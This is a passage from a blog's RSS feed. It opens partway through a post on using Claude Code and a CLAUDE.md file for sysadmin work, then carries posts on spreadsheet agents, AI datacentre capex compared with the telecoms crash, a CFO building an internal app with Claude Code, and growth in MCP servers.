<h2>CLAUDE.md as Project Memory</h2>
<p>Where this comes into its own is it becomes self documenting. There is no doubt I could have set the backup example up myself. However, now you can ask Claude to update the CLAUDE.md with what you did, verification steps and any 'gotchas' that came up. Doing this myself would take far longer than the task itself.</p>
<p>Once you do this, you'll have a new section in your CLAUDE.md, with something like this (but much more detailed):</p>
<pre><code>- Backups
    - Backups are handled with clickhouse-backup, and run every x hours
    - They are backed up to S3
    - To verify the backups have worked correctly, run `command` and assert `timestamp` is within the right amount of time
    - To restore backups, do...
    - Known issues: the s3-compatible storage we are using requires `x` version of the S3 protocol. Using an older version will result in `S3Version` errors.
</code></pre>
<p>This now makes it trivial to ask the agent in future to verify backup status, restore backups, etc. For me this has been a gamechanger with less-familiar tech that I don't have the common commands seared into my memory - and you can easily share this with teammates.</p>
<p>This is not a static document. Each section can be updated as you do things. For example, if you find out in a few months that backup restores take too long and you need to use a multithreaded approach, document that in CLAUDE.md. It should be a combination of a playbook and an incident log. This hugely helps the agent to not go round in circles on things you've already done - just like you'd document for a new engineer (but probably don't get round to it every time).</p>
<h2>Cloud-first</h2>
<p>This also works extremely well if you give it access instead of SSH but to the gcloud/azure/aws CLI, with access management setup correctly. The same approach applies - but instead of issuing SSH commands you are issuing $HYPERSCALER CLI commands.</p>
<h2>Conclusions</h2>
<p>I've found this scales surprisingly well for small teams. One question you may ask is why not just put this in the development repo (which is where I started)?</p>
<p>I've found when you start putting a lot of sysadmin info into your code repos CLAUDE.md it starts becoming the worst of both worlds - often trying to connect to production servers to debug something it doesn't need to, and equally looking far too much at code for things that are really quick infrastructure tweaks. Plus if you have multiple repos for your code, it's hard for it to have an overarching view of all the infrastructure involved.</p>
<p>The key is the documentation that is trivially added compounds in value. You end up with it remembering niche issues you resolved months ago that you forgot that caused strange side effects - hugely reducing time to resolution.</p>
<p>The psychological shift isn't always about saving time on the task itself. Instead, I find it's much more about documenting everything. If you are in a rush, it's very difficult to always take detailed notes of every command you ran and each thought you had.</p>
<p>Once you get into the habit of updating CLAUDE.md after every 'session' it also provides an interesting reflection of where your thought process went. I've definitely felt like I'm learning to be a better engineer seeing where I thought the issue was and what it ended up being in a summary diff.</p>
<p>Finally - this is also just as useful for humans. You can easily read and explore the CLAUDE.md and even get it to turn it into a nicely presented HTML file in a couple of minutes. Once it starts getting longer than a few pages, you just ask it to summarize certain areas. If you launch claude in the folder above your project folders, you can even ask it to do something like 'what version of Linux kernel are we on across every server' and get a report back in a couple of minutes.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/how-i-use-claude-code-to-manage-sysadmin-tasks/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/how-i-use-claude-code-to-manage-sysadmin-tasks/</guid>
      <pubDate>Sun, 16 Nov 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Could Excel agents unlock $1T in economic value?</title>
      <description>Software engineers underestimate the scale of Excel usage. With agents now able to work directly in spreadsheets, we&#39;re looking at transforming how billions of dollars in business processes are managed.</description>
      <content:encoded><![CDATA[<p>It seems the new space that is going to get transformed by agents is Excel. We've had <a href="https://www.tryshortcut.ai/">Shortcut</a>, then <a href="https://www.microsoft.com/en-us/microsoft-365/blog/2025/09/29/vibe-working-introducing-agent-mode-and-office-agent-in-microsoft-365-copilot/">Agent Mode</a> from Microsoft, and now <a href="https://www.claude.com/claude-for-excel">Claude for Excel</a>. This trend really piqued my attention and got me thinking of the economic impact of these agents. I think it's going to be absolutely enormous.</p>
<blockquote>
<p>NB. When I refer to Excel here, I also include Google Sheets or other spreadsheets.</p>
</blockquote>
<p><strong>(Most?) software engineers underestimate the scale of Excel</strong></p>
<p>Reading the Hacker News comments on the Claude for Excel launch puzzled me as most commentors did not seem to understand the scale of Excel usage out there. There are <em>billion</em> dollar processes in finance that are ran through a shared Excel file on a mounted network drive.</p>
<p>To me, Excel is where the majority of actual &quot;software&quot; exists. Virtually every company - of any size - will have <em>so many</em> critical business processes being ran and managed in Excel. For every &quot;properly&quot; designed and developed web app or other customer software, there will be dozens of Excel sheets hidden away.</p>
<p>The quality of these Excel &quot;systems&quot; vary, but is generally somewhere between appalling and mediocre. There is no source control management like Git, instead you've got FINAL v2 FIXED FINAL.xlsx. No unit/integration testing, and you're doing well if you have good quality input data validation.</p>
<p>As such, agents can have in my opinion an outsized impact on this market. Hopefully most of us now agree agents for software dev are useful, and a few months I posted a blog about how even Claude Code could have <a href="https://martinalderson.com/posts/building-a-tax-agent-with-claude-code/">amazing results for non-code tasks</a>. Seeing these new agents work within Excel is really interesting as it gets rid of the requirement for non technical people to understand terminal based apps.</p>
<p><strong>Why this is such a big deal</strong></p>
<p>While you've been able to input Excel files into ChatGPT/Claude/Gemini for some time, the workflow ends up being very similar to my pre-agent workflow for software engineering - a lot of copying and pasting and while helpful, slow and error prone.</p>
<p>The agent workflow make this far, far better. Instead of having to read the entire xlsx file, it can instead just read the parts it needs - which makes it far faster and stops you running out of context window in a few turns.</p>
<p>Most importantly, it's working against a real Excel instance, not naively editing the Excel file and hoping for the best. This means it can iteratively work and debug itself, allowing it to work on far more complex sheets.</p>
<p>If there is the equivalent of AGENTS.md, users can explain what a certain Excel file (or folder of files) do and how they relate to each other. This means it doesn't need to spend the first few minutes of the session getting up to speed. I think this will be even more powerful than in pure software development, as most code is actually quite readable even without comments to LLMs. Excel files are not the same.</p>
<p>Finally, they can also use scripting and bash commands to work things out &quot;out of band&quot; and verify results - and (very soon) transform that back to VBA or similar to Excel sheets. This will enable far more concise Excel sheets, as most users don't get into VBA and it is far more efficient for many tasks. Combine this with subagents that can go and do research on live data APIs and it is going to get extremely powerful for non-technical users.</p>
<p><strong>$1T? Really?</strong></p>
<p>I was in two minds to include this somewhat clickbaity number, but to be honest it could be <em>conservative</em>.</p>
<p>While the data is a bit messy, some research I found shows that <a href="https://www.acuitytraining.co.uk/news-tips/new-excel-facts-statistics/">38% of knowledge workers time</a> is spent in Excel.</p>
<p>According to the <a href="https://www.bls.gov/news.release/empsit.htm">Bureau of Labor Statistics</a>, there are approximately 70.9 million workers in management, professional, and related occupations in the United States. Applying the 38% number to this workforce gives  the equivalent of 27 million full-time employees doing nothing but Excel work.</p>
<p>In the same report, the BLS also reports that professional and business services workers earn an average of $44.57 per hour, which translates to approximately $92,700 annually for full-time work. Using a conservative estimate of $90,000 average salary for knowledge workers, we're looking at roughly $2.4 trillion in annual labour costs devoted to spreadsheet work across the US economy.</p>
<p>To give a concrete example - imagine a small manufacturer transposing data from a customs website to their own Excel sheet. This may involve downloading a CSV of customs data, and then painstakingly copying and pasting each row into a 'master' Excel sheet for cost tracking. This can take <em>days</em> of hard work (and is error prone). Agents could read the CSV file, use a python script to transpose and insert it into the Excel sheet, and run a bunch of verifications in the time it takes to make a coffee.</p>
<p>Importantly, the user doesn't need to know about Python (or even what Python is) - much like how Claude Code impresses with complex chained bash commands that I'd never think to write myself.</p>
<p>Therefore, even a 50% improvement in productivity unlocked by Excel agents has enormous impact - across the whole economy I suspect there is at least $1T of labour time 'wasted' in Excel - fixing formulae, copying and pasting data, getting insights out of the data, etc. These tasks are all very doable with the <em>current</em> state of LLMs, and will only get better from here.</p>
<p><strong>What this means</strong></p>
<p>As these general agents start working in a way less technical users can really leverage the power of them, I think it's fair to say there is enormous potential for huge productivity increases that will really transform the economy.</p>
<p>This is also going to mean big changes in employment too. Quite how that works out is difficult to know, but there are definitely going to be winners and losers as this technology sweeps through industry.</p>
<p>If you found this interesting, you might also enjoy:</p>
<ul>
<li><a href="https://martinalderson.com/posts/non-technical-cfo-shipping-better-code-than-agencies/">A non-technical CFO is shipping better code than the agencies he hired</a></li>
<li><a href="https://martinalderson.com/posts/building-a-tax-agent-with-claude-code/">What happens when coding agents stop feeling like dialup?</a></li>
<li><a href="https://martinalderson.com/posts/building-a-tax-agent-with-claude-code/">I gave Claude Code a folder of tax documents and used it as a professional tax agent</a></li>
</ul>
]]></content:encoded>
      <link>https://martinalderson.com/posts/excel-agents-could-unlock-1T-in-economic-value/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/excel-agents-could-unlock-1T-in-economic-value/</guid>
      <pubDate>Sun, 02 Nov 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Are we really repeating the telecoms crash with AI datacenters?</title>
      <description>Looking at actual token demand growth, infrastructure utilization, and capacity constraints - the economics don&#39;t match the 2000s playbook like people assume</description>
      <content:encoded><![CDATA[<p>I keep hearing the AI datacentre boom compared to the 2000s telecoms crash. The parallels seem obvious - billions in infrastructure spending, concerns about overbuilding, warnings of an imminent bubble. But when I actually ran the numbers, the fundamentals look completely different.</p>
<p>I'm not here to predict whether there will or won't be a crash or correction. I just want to look at whether the comparison to telecoms actually holds up when you examine the history in a bit more detail.</p>
<h2>What Actually Happened in the Telecoms Crash</h2>
<p>Let me start with what the 2000s telecoms crash actually looked like, because the details matter. Firstly, there was massive capex - between 1995 and 2000 somewhere like <a href="https://ideas.ted.com/an-eye-opening-look-at-the-dot-com-bubble-of-2000-and-how-it-shapes-our-lives-today/">$2 trillion was spent laying 80-90 million miles of fiber</a>. Inflation adjusted, this is over $4trillion, or close to <strong>$1trillion/year</strong> in 2025 dollars.</p>
<p>By 2002 only <a href="https://www.wsj.com/articles/SB1032982764442483713">2.7% of this fibre was used</a>.</p>
<p>How did this happen? A catastrophic supply and demand miscalculation past the pure securities fraud involved in many of the companies. Telecom CEOs <a href="https://ideas.ted.com/an-eye-opening-look-at-the-dot-com-bubble-of-2000-and-how-it-shapes-our-lives-today/">claimed</a> internet traffic was doubling every 3-4 months.</p>
<p>But in reality, <a href="https://www-users.cse.umn.edu/~odlyzko/doc/oft.internet.growth.pdf">traffic was doubling roughly every 12 months</a>. That's a <strong>4x overestimate</strong> of demand growth, which compounds each year. This false assumption drove massive debt-financed overbuilding. If you overestimate 4x a year for 3 years, by the end of your scenario you are 256x out.</p>
<p><em>Even worse</em> for these companies, enormous strides were made on the optical transceivers, allowing the same fibre to carry 100,000x more traffic over the following decade. Just one example is WDM multiplexing, allowing multiple carriers to be multiplexed on the same physical fibre line. In 1995 state of the art was 4-8 carriers. By 2000, it was 128. This <em>alone</em> allowed a 64x increase in capacity with the same infrastructure. Combined with improvements in modulation techniques, error correction, and the bits per second each carrier could handle, the same physical fibre became exponentially more capable.</p>
<p>The key dynamic: supply improvements were exponential while demand was merely linear. While some physical infrastructure needed to be built, there was enormous overbuilding that could mostly be serviced by technology improvements on the same infrastructure.</p>
<h2>AI Infrastructure: A Different Story</h2>
<p>Unlike fibre optics in the 1990s, GPU performance per watt improvements are actually slowing down:</p>
<p><strong>2015-2020 Period:</strong></p>
<ul>
<li>Performance per watt improved significantly with major architectural changes</li>
<li>Process nodes jumped from ~20nm to 7nm (major efficiency gains)</li>
<li>Introduction of Tensor Cores and specialized AI hardware</li>
</ul>
<p><strong>2020-2025 Period:</strong></p>
<ul>
<li><a href="https://epoch.ai/data-insights/ml-hardware-energy-efficiency">ML hardware energy efficiency improves ~40% annually</a></li>
<li>Performance per watt improvements slowing compared to previous era</li>
<li>Process nodes: improvements slowed dramatically with EUV being a requirement at sub 5nm wavelengths.</li>
</ul>
<p>More tellingly, <a href="https://www.tweaktown.com/news/97059/nvidias-full-spec-blackwell-b200-ai-gpu-uses-1200w-of-power-up-from-700w-on-hopper-h100/index.html">GPU TDPs (power consumption) are rising dramatically</a>:</p>
<ul>
<li>V100 (2017): 300W</li>
<li>A100 (2020): 400W</li>
<li>H100 (2022): 700W</li>
<li>B200 (2024): 1000-1200W</li>
</ul>
<p>This is the opposite of what happened in telecoms. We're not seeing exponential efficiency gains that make existing infrastructure obsolete. Instead, we're seeing semiconductor physics hitting fundamental limits.</p>
<p>The B200 from NVidia also requires liquid cooling - which means most datacentres designed for air cooling need to be completely retrofitted.</p>
<h3>Demand Growth Is Actually Accelerating</h3>
<p>The telecoms crash happened partly because demand was overestimated by 4x. What does AI demand growth look like?</p>
<p><strong>Traditional LLM Usage:</strong> <a href="https://techcrunch.com/2025/07/21/chatgpt-users-send-2-5-billion-prompts-a-day/">ChatGPT averages 20+ prompts per user per day</a>. Extended conversations can reach 3,000-4,000 tokens cumulative, though many users treat it like Google - short &quot;searches&quot; with no follow-up, consuming surprisingly few tokens.</p>
<p><strong>Agent Usage (<a href="https://www.anthropic.com/engineering/multi-agent-research-system">Anthropic research</a>):</strong></p>
<ul>
<li>Basic agents: <strong>4x more tokens</strong> than chat</li>
<li>Multi-agent systems: <strong>15x more tokens</strong> than chat</li>
<li>Coding agents: <strong>150,000+ tokens per session</strong> (multiple sessions daily)</li>
</ul>
<p>We're looking at a fundamentally different demand curve - if anything, people are underestimating how much agents will consume. The shift from chat to agents represents a 10x-100x increase in token consumption per user.</p>
<p>We're not even there yet, and infrastructure is already maxed out, with AI infrastructure running at very high utilization rates. Major providers still experience peak-time capacity issues. The problem isn't unused infrastructure sitting idle; it's infrastructure struggling to meet current demand. One major hyperscaler told me they <em>still</em> have capacity issues at peak times causing free tier users to have high error rates.</p>
<h3>Datacenter CapEx: Evolution, Not Revolution</h3>
<p>Another important piece of context that gets missed:</p>
<p><strong>Pre-AI Growth (2018-2021):</strong></p>
<ul>
<li>Combined Amazon/Microsoft/Google capex: <a href="https://platformonomics.com/2019/02/follow-the-capex-cloud-table-stakes-2018-edition/">$68B (2018)</a> → <a href="https://platformonomics.com/2022/02/follow-the-capex-cloud-table-stakes-2021-retrospective/">$124B (2021)</a></li>
<li>81% growth over 3 years</li>
<li>Annual growth rate: <strong>~22%</strong></li>
<li>Driven by cloud migration, pandemic acceleration, streaming</li>
</ul>
<p><strong>AI Boom (2023-2025):</strong></p>
<ul>
<li>2023: $127B</li>
<li>2024: <a href="https://platformonomics.com/2025/02/follow-the-capex-cloud-table-stakes-2024-retrospective/">$212B</a> (<strong>67% growth</strong> year-over-year)</li>
<li>2025 projected: <a href="https://www.cnbc.com/2025/02/08/tech-megacaps-to-spend-more-than-300-billion-in-2025-to-win-in-ai.html">$255B+</a> (Amazon $100B, Microsoft $80B, Alphabet $75B)</li>
</ul>
<p>While it's no doubt a huge amount of capex going into this rollout; it's not quite as dramatic as some news stories make out. I have no doubt that now any datacentre related capex is being rebranded as &quot;AI&quot;, even if it's just 'boring' old compute, storage and network not being directly used for AI.</p>
<h2>Why Forecasting Is Nearly Impossible</h2>
<p>Here's where I think the comparison to telecoms becomes both interesting and concerning.</p>
<p><strong>The Lead Time Problem:</strong></p>
<ul>
<li>Datacenters take 2-3 years to build</li>
<li>GPU orders have 6-12 month lead times</li>
<li>Can't adjust capacity in real-time to match demand</li>
</ul>
<p><strong>The Prisoner's Dilemma:</strong></p>
<ul>
<li>Underestimating demand = terrible user experience + losing to competitors</li>
<li>Overestimating demand = billions in wasted capex (that might just get used slower)</li>
<li>Given the choice, rational players overbuild - because wasting some capex is infinitely better than losing the &quot;AI wars&quot;</li>
</ul>
<p><strong>The Forecasting Challenge:</strong></p>
<p>Imagine you're planning datacenter capacity right now for 2027. You need to make billion-dollar decisions today based on what you think AI usage will look like in three years.</p>
<p>Here's scenario one: agent adoption is gradual. Some developers use Claude Code daily. A few enterprises deploy internal agents. Customer service stays mostly human with AI assist. You need maybe 3-4x your current infrastructure.</p>
<p>Here's scenario two: agents go mainstream. Every developer has an always-on coding agent consuming millions of tokens per session. Enterprises deploy agents across operations, finance, legal, sales. Customer service becomes 80% agentic with humans handling escalations. You need 30-50x your current infrastructure.</p>
<p>Both scenarios are completely plausible. Nobody can tell you which one is right. But you have to commit billions in capex NOW - datacenters take 2-3 years to build, GPU orders have 6-12 month lead times.</p>
<p><strong>But here's the really insidious part:</strong> even if you're directionally right, small errors compound massively. Let's say you're confident agents are going mainstream and you need roughly 50x growth over 3 years.</p>
<p>If actual demand is 40x, you've overbuilt by 25% - billions in excess capacity.
If actual demand is 60x, you've underbuilt by 20% - your service degrades and you lose market share.</p>
<p>You're trying to hit a moving target in the dark, and the margin of error is measured in tens of billions of dollars and thousands of megawatts of power infrastructure.</p>
<p>If you build for scenario one and scenario two happens, your service degrades to unusable, users revolt, and you lose the AI wars to competitors who bet bigger. If you build for scenario two and scenario one happens, you've got billions in underutilized datacenters burning cash.</p>
<p>Which mistake would you rather make?</p>
<p>This is where the telecoms comparison makes sense: given those choices, rational players overbuild. The difference is what happens to that overcapacity.</p>
<h2>The Key Differences</h2>
<p>Let me put this in a table:</p>
<table>
<thead>
<tr>
<th>Factor</th>
<th>Telecoms (1990s-2000s)</th>
<th>AI Datacenters (2020s)</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Supply improvements</strong></td>
<td>Exponential (100,000x capacity increase)</td>
<td>Slowing (69%→44% annual perf/watt gains)</td>
</tr>
<tr>
<td><strong>Demand growth</strong></td>
<td>Overestimated 4x</td>
<td>Potentially underestimated (agent transition)</td>
</tr>
<tr>
<td><strong>Utilization</strong></td>
<td>95% dark fiber (genuine overcapacity)</td>
<td>Very high - many providers still experiencing peak time scale problems</td>
</tr>
<tr>
<td><strong>Technology curve</strong></td>
<td>Making infrastructure obsolete</td>
<td>Hitting semiconductor physics limits</td>
</tr>
<tr>
<td><strong>Power consumption</strong></td>
<td>Decreasing</td>
<td>Increasing (300W → 1200W)</td>
</tr>
<tr>
<td><strong>Infrastructure lifespan</strong></td>
<td>Decades (fiber doesn't degrade)</td>
<td>Years (refreshed as better hardware arrives)</td>
</tr>
</tbody>
</table>
<p>The telecoms crash happened because exponential supply improvements met linearly growing (and overestimated) demand, with infrastructure that would last decades sitting unused.</p>
<p>AI datacenters are facing slowing supply improvements meeting potentially exponentially growing demand. And crucially, because GPU efficiency improvements are slowing down, today's hardware retains value for longer - not shorter - than previous generations.</p>
<h2>What About a Short-Term Correction?</h2>
<p>Could there still be a short-term crash? Absolutely.</p>
<p><strong>Scenarios that could trigger a correction:</strong></p>
<p><strong>1. Agent adoption hits a wall</strong></p>
<p>Enterprises might discover that production agent deployments are harder than demos suggest. Hallucinations in high-stakes workflows, regulatory concerns around autonomous AI systems, or implementation complexity could slow adoption dramatically. If the agent future takes 5-7 years instead of 2-3, there's a painful gap where billions in infrastructure sits waiting for demand to catch up.</p>
<p>However, given the explosion in usage for software engineering and other tasks, I suspect this is highly unlikely. You can already use Claude Code for <a href="https://martinalderson.com/posts/building-a-tax-agent-with-claude-code/">non engineering tasks</a> in professional services and get very impressive results without any industry specific modifications, so I have no doubt there is going to be very high adoption of agents in all kinds of areas.</p>
<p><strong>2. Financial engineering unravels</strong></p>
<p>These datacenter buildouts are heavily debt-financed. If credit markets seize up, interest rates spike further, or lenders lose confidence in AI growth projections, the financing model could collapse. This wouldn't be about technical fundamentals - it would be good old-fashioned financial panic, similar to what happened in telecoms when the debt markets froze, but with one key difference - a lot of the key players (Microsoft, Google, Meta, Oracle) are extremely cash flow positive, which definitely wasn't the case in the 2000s fibre boom. The pure datacentre players though are at risk - who don't have a money printing main business to backstop the finance -  no doubt about that.</p>
<p><strong>3. Efficiency breakthroughs change the math</strong></p>
<p>Model efficiency could improve faster than expected. Or we could see a hardware breakthrough: custom ASICs that are 10x more efficient than GB200s for inference workloads. Either scenario could make current buildouts look excessive. I actually think this is the biggest risk - and this is <em>exactly</em> what happened in the fibre boom. So far, I'm not seeing signs of this though. While specialist ASICs are becoming available, they hit their impressive speed by having huge wafers, which isn't a huge efficiency game (yet).</p>
<p><strong>The Key Difference From Telecoms:</strong></p>
<p>Even if there's a correction, the underlying dynamics are different. Telecoms built for demand that was 4x overestimated, then watched fiber optic technology improvements make their infrastructure obsolete before it could be utilized. The result: 95% of fiber remained permanently dark.</p>
<p>AI datacenters might face a different scenario. If we build for 50x growth and only get 30x over 3 years, that's not &quot;dark infrastructure&quot; - that's just infrastructure that gets utilized on a slower timeline than expected. Unlike fiber optic cable sitting in the ground unused, GPU clusters still serve production workloads, just at lower capacity than planned.</p>
<p>And unlike telecoms where exponential technology improvements made old infrastructure worthless, GPU efficiency improvements are slowing. A GB200 deployed today doesn't become obsolete when next year's chip arrives - because that chip is only incrementally better, not 100x better. With process node improvements slowing down, current generation hardware actually retains value for longer.</p>
<p>A correction might mean 2-3 years of financial pain, consolidation, and write-downs as demand catches up to capacity. But that's fundamentally different from building infrastructure for demand that never materializes while technology makes it obsolete.</p>
<h2>The Real Risk: Timing, Not Direction</h2>
<p>I think the real question isn't whether we need massive AI infrastructure - the agent transition alone suggests we do. The question is timing.</p>
<p>If enterprises take 5 years to adopt agents at scale instead of 2 years, and hyperscalers have built for the 2-year scenario, you could see a 2-3 year period of overcapacity and financial pain. That might be enough to trigger a correction, layoffs, and consolidation.</p>
<p>But unlike telecoms, that overcapacity would likely get absorbed.</p>
<p>The telecom fibre mostly stayed dark because technology outpaced it and demand never materialized. AI infrastructure might just be early, not wrong.</p>
<h2>Conclusion</h2>
<p>Are we repeating the telecoms crash with AI datacenters? The fundamentals suggest not, but that doesn't mean there won't be bumps.</p>
<p>The key insight people miss when making the telecoms comparison: telecoms had exponential supply improvements meeting linear demand, with 4x overestimated growth assumptions. AI has slowing supply improvements potentially meeting exponential demand growth from the agent transition.</p>
<p>The risks are different:</p>
<ul>
<li><strong>Telecoms:</strong> Built too much infrastructure that became completely obsolete by supply-side technology improvements</li>
<li><strong>AI:</strong> Might build too much too fast for demand that arrives slower than expected</li>
</ul>
<p>But the &quot;too much&quot; in AI's case is more like &quot;3 years of runway instead of 1 year&quot; rather than &quot;95% will never be used.&quot;</p>
<p>I could be wrong. Maybe agent adoption stalls, maybe model efficiency makes current infrastructure obsolete, maybe there's a breakthrough in GPU architecture that changes everything. But when I look at the numbers, I don't see the same setup as the telecoms crash.</p>
<p>The fundamentals are different. That doesn't mean there won't be pain, consolidation, or failures. But comparing this to 2000s telecoms seems like the wrong mental model for what's actually happening.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/are-we-really-repeating-the-telecoms-crash-with-ai-datacenters/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/are-we-really-repeating-the-telecoms-crash-with-ai-datacenters/</guid>
      <pubDate>Sat, 25 Oct 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>A non-technical CFO is shipping better code than the agencies he hired</title>
      <description>A non-technical CFO built a production operations dashboard with Claude Code that had failed with low-code tools and agencies. This shift in who can build software is going to change everything.</description>
      <content:encoded><![CDATA[<p>I've been advising non-technical execs at mid-sized companies for a while now. Since the release of Claude Code and other agentic coding tools, I'm starting to see a real shift in what these people can achieve.</p>
<p>I was pretty astonished to see a non-technical friend (CFO) who had managed to use Claude Code to build a pretty impressive internal operations dashboard, tying various systems together. He'd been trying to build this for many years; one of those (many?) projects where it is very useful, but hard to justify the budget/return on investment to hire and manage a full development team.</p>
<p>This project had been tried with various other approaches:</p>
<ul>
<li>AirTable (fell apart once data reached a certain size, too slow)</li>
<li>Low code tooling (didn't quite work, again, hit scale problems)</li>
<li>A low code agency specialising in retool (many problems from what I can gather transferring business domain knowledge to them)</li>
</ul>
<p>I told him about Claude Code a month or two ago, and recently caught up with him. To my surprise there was a pretty well thought through application in Next.js which seemed surprisingly bug-free.</p>
<p>If he'd hired a less senior developer with no domain understanding I think getting to the point he got to with Claude Code would have actually been quite challenging.</p>
<p>I think this therefore highlights a significant shift in how software projects are going to be put together. I am not here to suggest that suddenly all developers are going to be replaced - I'll come to some of the areas where they are extremely valuable still - but what is very clear to me is that business people with LLMs <strong>and</strong> all their domain knowledge is an extremely powerful combination for (at least) internal systems.</p>
<p>What I do think is at real risk of automation over the coming years are less senior engineers with limited domain knowledge.</p>
<h2>Domain knowledge is what's important in this new era</h2>
<p>As someone that has mostly sat at the interface between technical strategy &amp; commercial outcomes for the past decade, I've worked with a lot of great developers who do get the importance of domain knowledge, and others that (usually for corporate culture reasons) get treated as a &quot;JIRA robot&quot;, picking up essential random tickets and following them to the letter.</p>
<p>The importance of developers having good domain knowledge and being trusted to experiment within it cannot be underestimated.</p>
<p>It has three main benefits in my view:</p>
<ol>
<li>It's extremely frustrating for business stakeholders to try to explain intricacies of the problem and the edge cases with someone that doesn't get the business. This causes a major morale drop, and often leads to poor outcomes because stakeholders give up pushing for what they need eventually. Equally it's hard for the developer to get up to speed on years of accumulated organisational knowledge</li>
<li>Perhaps more importantly, it allows developers to have some element of 'predictive software design'. If you know a lot about the industry you are working in, you start being able to predict what parts will need future flexibility and start designing for that even if there isn't a commercial need. You also start to get a feel for what can be 'hardcoded' as it is very unlikely to change.</li>
<li>Finally, and somewhat obviously, it massively improves the cohesion and iteration speed. Product development goes from less of a one way &quot;JIRA factory&quot; to a collaborative option, where developers can offer ideas and suggestions based on the code and the product goals</li>
</ol>
<p>The issue is if you don't have this culture of shared understanding in your organisation, I think you'll see non technical stakeholders start to build their own products and tools very quickly with these tools.</p>
<p>It completely solves part 1) - they can literally transfer the domain knowledge to the LLM very quickly with a back and forth, and they can work together on 3).</p>
<p>This is going to substantially change the face of the industry. At a minimum we're going to see a lot more fully coded prototypes being handed over to product teams instead of PRDs or sketches of wireframes. I am sure a lot of these tools will also get put into production use - especially at smaller organisations where there isn't a CISO overlooking these kind of deployments.</p>
<h2>Where senior developers are still essential</h2>
<p>For now I think this is actually all good news for more senior developers, especially with domain knowledge.</p>
<p>While agentic coding tools are improving at a very rapid rate, they don't out of the box tend to setup unprompted:</p>
<ul>
<li>A proper software development lifecycle</li>
<li>Source control approach and CI/CD</li>
<li>Unit/integration/e2e testing</li>
<li>A well thought out approach to security/access control</li>
<li>Performance/scalability</li>
</ul>
<p>This tends to be what senior/lead engineers can do in their sleep - take a &quot;MVP&quot; app and make it (more) &quot;production ready&quot; and help on the ongoing scalability of said apps. Ironically, when <em>prompted correctly</em> they can do a pretty good job of each of these parts, but it is going to beyond non technical users to understand these concepts to prompt it.</p>
<p>So I can see a world where suddenly organisations have 10-50x the number of internal applications, and senior engineers helping out with taking these MVPs that business stakeholders build and making them production ready.</p>
<p><a href="https://en.wikipedia.org/wiki/Jevons_paradox">Jevons Paradox</a> states that when something gets cheaper, the demand for it often rises far more than the price reduction. We're seeing potentially a 95%+ drop in costs for people to build internal business apps, so we'd expect to see way more of them.</p>
<p>There's always going to be a place for highly knowledgeable, motivated and smart software engineers. But I'm increasingly convinced they are going to see less and less MVPs from start to finish.</p>
<h2>How are we going to manage so many new apps?</h2>
<p>Where I can see this all going wrong is having so many new apps to manage. We're assuming a lot get transferred to an engineering team to develop further, which I expect will happen to some degree. However, I suspect there is going to be a huge long tail of 'ghost' apps that people build without really thinking too much about the ongoing maintenance.</p>
<p>We're going to need some sort of internal company 'PaaS' to manage them all. This PaaS should handle authentication and data access at a higher level (similar to Cloudflare Zero Trust), but be super simple for people to deploy apps. If we can reduce the attack surface of these apps being hosted on random (personal) Vercel accounts, then that is half the battle.</p>
<p>Ideally this PaaS would automatically manage to a certain degree platform and package updates, automatically deploying security fixes. I think &quot;agentic&quot; DevOps will really help out here - attempting to patch apps, and notifying if the agent fails.</p>
<p>Data exfiltration is a concern but again this PaaS could firewall outbound network (similar to how the Claude analysis tools are hardened to only allow very limited network requests).</p>
<p>However, we must keep in mind that right now this already happens - with a lot of random Excel and Google Sheets running a lot of critical business processes, often being emailed around. So I actually think there is a lot of opportunity to improve security and data access with this new future that's on the way - it's far easier to reason about and secure web applications than Excel files - especially if we could have a centralized, ACL'd SQL database system that isolates everyone's apps correctly, only allowing access to the data they need with the lowest possible permissions.</p>
<p>As such I think it's worth senior technical leadership starting to think of a strategy about this <em>now</em>. How would you handle 100x the amount of internal apps, and what processes would you put in place?</p>
<p>When tools like Claude Code get more enterprise support I suspect it's going to be a lot easier to start including an 'organization-level' claude.md file. But let's think this through now and start communicating the plan.</p>
<p>This to me means that developers will move less on line of business apps and more to building the systems, policies and automating the infrastructure, to allow organisations to deliver agentically built business applications at scale.</p>
<p>I'm really excited (and to be honest, slightly scared) about this new future. There are <em>so many</em> business challenges that are done in Excel that would unlock so much productivity if they could be built in code.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/non-technical-cfo-shipping-better-code-than-agencies/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/non-technical-cfo-shipping-better-code-than-agencies/</guid>
      <pubDate>Fri, 17 Oct 2025 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Tracking MCP Server Growth</title>
      <description>I built a tracker to monitor the growth of MCP servers in the wild - turns out the ecosystem is growing faster than I expected</description>
      <content:encoded><![CDATA[<p>I've been curious about how fast the MCP ecosystem is actually growing. There's a lot of buzz around it, but I wanted to see real numbers. So I built a tracker that monitors MCP servers from the <a href="https://registry.modelcontextprotocol.io/">official MCP server registry</a>.</p>
<p>You can check it out here: <a href="https://mcp-tracker.martinalderson.com/">mcp-tracker.martinalderson.com</a></p>
<p><img src="https://martinalderson.com/img/mcp-tracker-growth.png" alt="MCP Server Growth Over Time"></p>
<p>The data shows steady growth. In just the past week, we've gone from around 900 servers to over 1,150. That's roughly 25-30 new servers being published every day.</p>
<p>If you're building MCP servers or using them in your workflow, I'd be curious to hear what you're working on - <a href="https://martinalderson.com/contact">drop me a note</a>. The tracker updates daily, so you can watch the ecosystem evolve in real time.</p>
<p>This is getting interesting.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/tracking-mcp-server-growth/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
